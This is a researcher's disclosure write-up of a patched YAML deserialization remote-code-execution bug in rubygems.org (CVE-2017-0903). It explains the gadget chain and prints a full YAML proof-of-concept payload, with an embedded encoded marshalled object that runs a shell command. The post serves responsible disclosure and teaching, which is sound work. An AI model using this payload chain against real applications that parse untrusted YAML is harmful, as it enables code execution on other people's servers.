Remote Code Execution on rubygems.org
tl;dr Remote code execution via a deserialization vulnerability on rubygems.org, a very popular hosting service for ruby dependencies. A fix was rolled out quickly. Read the official announcement here. CVE-2017-0903
If you have ever written a ruby application, it is very likely that you have interacted with rubygems.org. You’ve probably even trusted that site to run arbitrary programs on your computer. When you run, for example, gem install rails
, the gem
utility fetches the rails
gem and all of its dependencies from rubygems.org, and installs everything into the appropriate places. Anyone can publish gems there after making an account.
Rubygems.org is itself a rails application with a clearly laid out responsible disclosure policy.
Vulnerability
Ruby gems are actually just tar archives, so running tar -xvf foo.gem
will ordinarily leave you with three files:
metadata.gz
data.tar.gz
checksums.yaml.gz
These files are pretty much what they look like. All are gzipped. metadata.gz
contains a YAML file with information about the gem like its name, author, version, and so on. data.tar.gz
contains another tar archive with all the source code. checksums.yaml.gz
contains a YAML file with some cryptographic hashes of the gem’s contents.
I was surprised to learn that parsing untrusted YAML is dangerous. I had always figured it was a benign interchange format like JSON. In fact, YAML allows for the encoding of arbitrary objects, much like python’s pickle.
When you upload a gem to rubygems.org, the application calls Gem::Package.new(body).spec
. The rubygems
gem, where this method lives, uses unsafe calls to YAML.load
to load the YAML files in the gem.
However, the authors of rubygems.org knew this (probably as a result of this incident), and as of 2013 were monkey-patching the YAML and gem parsing libraries to only allow the deserialization of a whitelist of classes, eventually switching to using Psych.safe_load
in 2015.
Unfortunately, the monkey-patching was insufficient, since it only patched the Gem::Specification#from_yaml
method. If we check out what actually happens in that call to #spec
, we see that it calls #verify
, the important parts of which are reproduced below:
# ...
@gem.with_read_io do |io|
Gem::Package::TarReader.new io do |reader|
read_checksums reader
verify_files reader
end
end
verify_checksums @digests, @checksums
# ...
Then, in #read_checksums
:
# ...
Gem.load_yaml
@checksums = gem.seek 'checksums.yaml.gz' do |entry|
Zlib::GzipReader.wrap entry do |gz_io|
YAML.load gz_io.read # oops
end
end
# ...
OK, so we have a call to YAML.load
with input that we control. How can we exploit it? Originally I attempted to have my exploit code run at the time of the YAML.load
call itself. This turned out to be more challenging than I had anticipated, because although I could deserialize arbitrary objects, the only actual method calls I could make on those objects were very limited. Psych, the YAML parsing library used here, would let me make calls to methods like #[]=
, #init_with
, and #marshal_load
(not Marshal.load
; that would have made exploitation much easier). But for most objects, those methods don’t give an attacker much flexibility, since common practice is for them to just initialize a couple variables and return. It seems plausible that there is some object in some standard rails library with a dangerous #[]=
method (as there have been in the past), but I didn’t find one.
Instead, I looked back at the rubygems.org application. What does it do with that @checksums
variable, which we can now set to be an instance of any in-scope class? Over in #verify_checksums
:
# ...
checksums.sort.each do |algorithm, gem_digests|
gem_digests.sort.each do |file_name, gem_hexdigest|
computed_digest = digests[algorithm][file_name]
# ...
So if we can build an object where calling #sort
does something dangerous, we can trigger our exploit. In the end, I came up with the following proof of concept. The payload that actually gets evaled is contained in the base-64 encoded, DEFLATE compressed, marshalled section at the bottom (in this case, it just shells out to run echo "oops"
):
SHA1: !ruby/object:Gem::Package::TarReader
io: !ruby/object:Gem::Package::TarReader::Entry
closed: false
header: 'foo'
read: 0
io: !ruby/object:ActiveSupport::Cache::MemoryStore
options: {}
monitor: !ruby/object:ActiveSupport::Cache::Strategy::LocalCache::LocalStore
registry: {}
key_access: {}
data:
'3': !ruby/object:ActiveSupport::Cache::Entry
compressed: true
value: !binary '\
eJx1jrsKAjEQRbeQNT4QwQ9Q8hlTRXGL7UTFemMysIGYCZNZ0b/XYsHK8nIO\
nDtRBGbvJDzxMuRMLABHzIzOSqD0G+jbVMQmhzfLwd4jnphebwUrE0ZAoJrz\
YQpLE0PCRKGCmSnsWr3p0PW000S56G5eQ91cv9oDpScPC8YyRIG18WOMmGD7\
/1X1AV+XPlQ='
Starting from the last step and working backwards to the call to #sort
:
At the bottom we have an ActiveSupport::Cache::Entry
object. The important thing about this object is that when the #value
method is called and @compressed
is true, it will call Marshal.load
on DEFLATE compressed, attacker provided data. The object that is unmarshalled is constructed in such a way that calling just about any method on it will execute the attacker’s code. The exact method used here has been written about before – here is how it works. Unfortunately, we can’t just deserialize this object with YAML to achieve code execution, because it undefs almost all of its methods, including the ones that allow us to set instance variables. It really needs to be loaded with Marshal.load
to be useful in this context.
Working our way up, the ActiveSupport::Cache::MemoryStore
object holds our malicious unmarshalled object in a hash called @data
. Its parent class, ActiveSupport::Cache::Store
defines a #read
methodthat calls #read_entry
within the MemoryStore
. #read_entry
basically just grabs the entry out of @data
and returns it.
The call to MemoryStore#read
comes from a call to Gem::Package::TarReader::Entry#read
, which itself is called by Gem::Package::TarReader#each
. After the read returns, #size
is called on the returned value, which our malicious unmarshalled object does not define, causing our payload to execute.
Finally, because Gem::Package::TarReader
specifies include Enumerable
, a call to its #sort
method will call its #each
method, starting the whole chain above.
Conclusion
For me, one of the takeaways here is that YAML is very powerful, and sometimes used in contexts where less expressive (but safer) interchange formats like JSON might be more appropriate. Perhaps in the future, YAML.load
could be modified to take a whitelist of classes as an optional parameter, making the deserialization of complex objects an opt-in behavior. YAML.load
in its current state should really be named something like YAML.unsafe_load
to get the point across, instead of relying on users to know when they should use YAML.safe_load
.
Thanks very much to the rubygems.org team for running a responsive bug bounty program.
Shameless plug
If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider joining Mastodon! It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!
最新评论